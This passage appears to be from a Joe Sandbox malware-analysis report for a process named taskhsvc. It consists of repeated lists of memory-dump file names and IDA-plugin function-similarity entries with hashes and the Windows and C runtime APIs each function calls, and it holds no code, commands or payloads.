Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$FormatMessage_strdupabortexit
String ID:
API String ID: 1336406275-0
Opcode ID: edd7b1c52cfcd00678d7d894828dd36247d53357c21b504c1d4614aadcfbb047
Instruction ID: b77255c8656adf002bcacdd40655318fb3e5eb8549901fdaacd2a0e30d188887
Opcode Fuzzy Hash: edd7b1c52cfcd00678d7d894828dd36247d53357c21b504c1d4614aadcfbb047
Instruction Fuzzy Hash: C011C3B0A0430ACFDB10EFA9C5857AEBBF0AB44344F044829E594E7385E374AA44CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00EE59C4 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

_open.MSVCRT ref: 00EE5A44
__stack_chk_fail.LIBSSP-0 ref: 00EE5A5A

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$_open
String ID:
API String ID: 627647723-0
Opcode ID: a838ccc0f18376ea23d8b7c6703a513f322fa22667fcebd3bde7609e185bd759
Instruction ID: 0756b6aefd536c03de90a2ee2033a6e2e47d787d797a2812bed60b3fdb4e0287
Opcode Fuzzy Hash: a838ccc0f18376ea23d8b7c6703a513f322fa22667fcebd3bde7609e185bd759
Instruction Fuzzy Hash: B51155B491430A9FCB40DFA9C585A9EBBF0FB48304F508929E898E7344D374EA459F62

Uniqueness

Uniqueness Score: -1.00%

Function 00EE8B88 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E019FB), ref: 00EE8C4C

Part of subcall function 00EE8B20: memset.MSVCRT ref: 00EE8B46
Part of subcall function 00EE8B20: GetSystemInfo.KERNEL32 ref: 00EE8B56
Part of subcall function 00EE8B20: __stack_chk_fail.LIBSSP-0 ref: 00EE8B81

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00EE8BEE

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$InfoSystemabortmemset
String ID:
API String ID: 1515217925-0
Opcode ID: 3facccf92968c6f942ce2db959fa07831480da9464d1796900c8462881b466f2
Instruction ID: 53a1a66befaf53c6db91cf1767701b638b61c3b4420a232ace55fac37aafe049
Opcode Fuzzy Hash: 3facccf92968c6f942ce2db959fa07831480da9464d1796900c8462881b466f2
Instruction Fuzzy Hash: 2B119E7080538D9FC708EF79D98520EBBF1AB41318F508D09E1849B391C778D989AF53

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1355 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00EF1197: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00EF1389), ref: 00EF11EF

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE9CF8), ref: 00EF13E7

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE9CF8), ref: 00EF13C1

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abort
String ID:
API String ID: 1190921433-0
Opcode ID: 8b8e0709bd260056752c904e24023444c06165df16704784a7849d74f71648a2
Instruction ID: a86510d3a888e405ea508a9a2302865aec118006ebacf1b7560f88f2dd67f1bc
Opcode Fuzzy Hash: 8b8e0709bd260056752c904e24023444c06165df16704784a7849d74f71648a2
Instruction Fuzzy Hash: 9011A5B4905309DFCB00EFA9C68559DBBF4BF48344F019859E984E7305D734E9459F51

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6D57 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00EE6D7F
__stack_chk_fail.LIBSSP-0 ref: 00EE6DE2

Part of subcall function 00EE910D: __stack_chk_fail.LIBSSP-0 ref: 00EE9194

Part of subcall function 00EE919B: strerror.MSVCRT ref: 00EE91ED
Part of subcall function 00EE919B: __stack_chk_fail.LIBSSP-0 ref: 00EE91FD

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
